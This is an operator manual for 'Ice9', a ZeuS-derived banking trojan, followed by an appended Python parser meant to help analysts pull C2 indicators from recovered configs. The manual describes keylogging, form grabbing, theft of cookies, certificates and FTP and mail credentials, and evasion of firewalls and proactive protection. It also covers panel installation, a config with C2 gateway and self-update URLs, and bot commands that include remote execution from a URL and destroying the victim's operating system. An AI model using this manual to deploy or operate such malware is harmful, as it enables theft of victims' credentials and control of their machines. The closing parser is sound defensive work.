==================================================
BRIEF DESCRIPTION
==================================================

Ice9 is a new formgrabber bot similar to ZeuS. It was based on the second-line version of ZeuS and was redesigned and improved in quality. The main task was to increase the check-in rate relative to its progenitor, and this task was accomplished successfully. Bypass of proactive protection and firewalls was improved. The injection technology received the same treatment, which makes the injects work much more stably. The bot is constantly evolving and being updated.

==================================================
FUNCTIONALITY
==================================================

- Keylogging
- Grabbing HTTP and HTTPS form data, and injecting its code into Internet Explorer and browsers built on its engine (AOL, Maxthon, etc.), and Mozilla Firefox
- Grabbing cookies, SOL files and saved form data
- Grabbing FTP clients: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1,2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
- Grabbing Windows Mail, Live Mail, Outlook
- SOCKS, with the possibility of backconnect
- Screenshots in real time, as well as the ability to set a trigger when a particular URL is viewed
- Obtaining certificates from the "MY" store (certificates marked "not exportable" are not exported correctly) and their processing. After that, any imported certificate will be stored on the server.
- Sniffer for TCP traffic
- Wide range of commands to control the infected PCs
- VNC module

==================================================
PROCEDURE
==================================================

The installation procedure consists of 2 parts:
a) installing the server part (control panel, bot)
b) configuring the bot

- Installing the server side:
  Upload the folder with the server part to the web server and set CHMOD 777 on the "system" directory.
  Create a MySQL database.
  Run the script install/index.php in the uploaded server folder and follow the online instructions.
  Note: the PHP module mb_strings is required.

- Configuring the bot:
  The bot has a configuration file, settings.txt, which holds all the settings it needs to work. The settings file is divided into several sections:

    ; Settings (basic settings)
    {"Settings"
        ; Path to the bot itself (the bot downloads this EXE if a newer config version was created and tries to self-update)
        autoupdate_path "http://localhost/bot.exe"
        ; Gateway to the admin panel (the path through which the bot passes information to the Control Panel)
        receiving_script_path "http://localhost/script.php"
        ; File name with injects
        injects_file "injects.txt"
        ; Data grabbing filters (the format is fully compatible with the ZeuS format)
        {"DataGrabFilters"
            ; "http://mail.rambler.ru/*" "passw;login"
        }
        ; Fake hidden URI redirects (the format is fully compatible with the ZeuS format)
        {"URLRedirects"
            ; "http://www.rambler.ru" "http://www.yandex.ru" "GP" "" ""
        }
        ; Paths to backup config files (if the main config is unavailable, the bot will attempt to download and use the backup configuration file)
        {"MirrorServers"
            "http://advdomain/cfg1.bin"
        }
        ; URI masks
        {"URLMasks"
            "Nhttp://*odnoklassniki.ru/*"
            "Nhttp://vkontakte.ru/*"
            "S*/login.osmp.ru/*"
            "S*/atl.osmp.ru/*"
        }
    }

  The list of available URI mask flags:
  N - do not write data to reports
  S - take a screenshot on mouse clicks in the page area matching the URI mask
  C - save all cookies associated with that URI and block access to it
  B - block access to the URI

==================================================
DESCRIPTION OF THE BUILDER
==================================================

- Creating a bot (not available for the version tethered to the host):
  Setting's path - the path to the configuration file
  Botnet's name - the name of the botnet
  Settings retrieve timeout - interval between the bot's downloads of settings from the server
  Statistics retrieve timeout - interval between the sending of reports to the server
  RC4 encryption key - the encryption key (must match the key in the admin panel)
  Remove certificate - remove certificates when installing the bot
  Disable TCP - disable the TCP server (SOCKS server, real-time screenshots); increases concealment

- Creating a configuration file:
  RC4 encryption key - the encryption key (must match the key in the admin panel)
  Settings file - the path to the configuration file

- Finding and removing the bot from the system:
  Enter the RC4 encryption key at the bottom of the window. If a bot with the same key is present on your system, the delete button will become available.

==================================================
LIST OF BOT COMMANDS (commands are entered in the admin panel's Scripts section)
==================================================

Working with the OS:
os_shutdown - Shut down the computer
os_reboot - Reboot the computer

Working with the bot:
bot_uninstall - Unload the bot from the computer
bot_update [url] - Update the bot
bot_update_exe [url] - Update the bot executable
bot_bc_add [service] [ip] [port] - Create a backconnect connection with the bot
bot_bc_remove [service] [ip] [port] - Remove a backconnect connection with the bot
bot_httpinject_disable [url_mask] - Disable the bot's HTTP injects
bot_httpinject_enable [url_mask] - Enable the bot's HTTP injects

Working with the user:
user_destroy - Destroy the operating system of the bot's computer
user_logoff - Terminate the user session on the bot's computer
user_execute [url] - Run the executable file on the bot's computer; this command updates the bot EXE
user_cookies_get - Get cookies from the bot's computer
user_cookies_remove - Remove cookies from the bot's computer
user_certs_get - Get certificates from the bot's computer
user_certs_remove - Delete certificates from the bot's computer
user_url_block [url_mask] - Block a URL
user_url_unblock [url_mask] - Unblock a URL
user_homepage_set [url] - Set the URL as the homepage on the bot's computer
user_flashplayer_get - Get SOL files from the bot's computer
user_flashplayer_remove - Delete SOL files from the bot's computer
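For an analyst who has recovered a plaintext settings.txt from an infected host or a panel, the configuration section above is the most useful part of this document: the gateway, update path and mirror URLs are the bot's command-and-control endpoints, and the URLMasks flags show which sites the operator screenshots, steals cookies from, or blocks. The following parser is an added example written from that defender's perspective; it is not code from the kit or its authors. It assumes the layout documented above (sections open with {"Name" and close with }, lines beginning with ";" are comments, values are double-quoted) and uses a constructed sample config with placeholder hostnames.

```python
"""Triage parser for the Ice9/ZeuS-style settings.txt layout described above.

Added example for defenders; not the kit's own code. Assumptions: sections
open with {"Name" and close with }, ';' starts a comment, values are quoted.
"""
import re
from dataclasses import dataclass, field

# Constructed sample in the documented layout; all hostnames are placeholders.
SAMPLE_CONFIG = r'''
{"Settings"
    ; Path to the bot itself
    autoupdate_path "http://c2.example.invalid/bot.exe"
    receiving_script_path "http://c2.example.invalid/script.php"
    injects_file "injects.txt"
    {"DataGrabFilters"
        ; "http://webmail.example.invalid/*" "passw;login"
    }
    {"MirrorServers"
        "http://mirror.example.invalid/cfg1.bin"
    }
    {"URLMasks"
        "Nhttp://*social.example.invalid/*"
        "S*/login.bank.example.invalid/*"
        "C*/webmail.example.invalid/*"
        "B*/av-vendor.example.invalid/*"
    }
}
'''

# Meaning of the URLMasks prefix letters, as documented on this page.
MASK_FLAGS = {
    "N": "not written to reports",
    "S": "screenshot on mouse clicks",
    "C": "cookies saved, access blocked",
    "B": "access blocked",
}

QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


@dataclass
class BotConfig:
    settings: dict = field(default_factory=dict)   # key -> value in "Settings"
    mirrors: list = field(default_factory=list)    # backup config URLs
    url_masks: list = field(default_factory=list)  # (flag, mask) pairs


def parse_config(text):
    """Walk the file line by line, tracking the stack of open sections."""
    cfg = BotConfig()
    stack = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank or comment line
        if line.startswith("{"):
            m = QUOTED.search(line)
            stack.append(m.group(1) if m else "?")
            continue
        if line == "}":
            if stack:
                stack.pop()
            continue
        section = stack[-1] if stack else None
        values = QUOTED.findall(line)
        if section == "Settings" and values:
            key = line.split(None, 1)[0]
            cfg.settings[key] = values[0]
        elif section == "MirrorServers":
            cfg.mirrors.extend(values)
        elif section == "URLMasks":
            for v in values:
                if v and v[0] in MASK_FLAGS:
                    cfg.url_masks.append((v[0], v[1:]))
    return cfg


def network_indicators(cfg):
    """URLs to block and hunt for: C2 gateway, self-update path, config mirrors."""
    urls = [cfg.settings.get("autoupdate_path"),
            cfg.settings.get("receiving_script_path")] + cfg.mirrors
    return sorted({u for u in urls if u})


def hosts_from(urls):
    """Reduce full URLs to hostnames for a DNS/proxy blocklist."""
    return sorted({re.sub(r"^\w+://", "", u).split("/")[0] for u in urls})


def describe_masks(cfg):
    """Human-readable view of what the operator does on each matched URI."""
    return [(mask, MASK_FLAGS[flag]) for flag, mask in cfg.url_masks]


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    for url in network_indicators(cfg):
        print("C2/update URL:", url)
    for mask, meaning in describe_masks(cfg):
        print(f"{mask:40s} {meaning}")
```

The "C" and "B" masks are worth surfacing to the user-facing side of an incident: a "B" mask that points at a security vendor's domain explains why updates or scans failed on the host, and "C" masks identify sessions whose cookies should be invalidated.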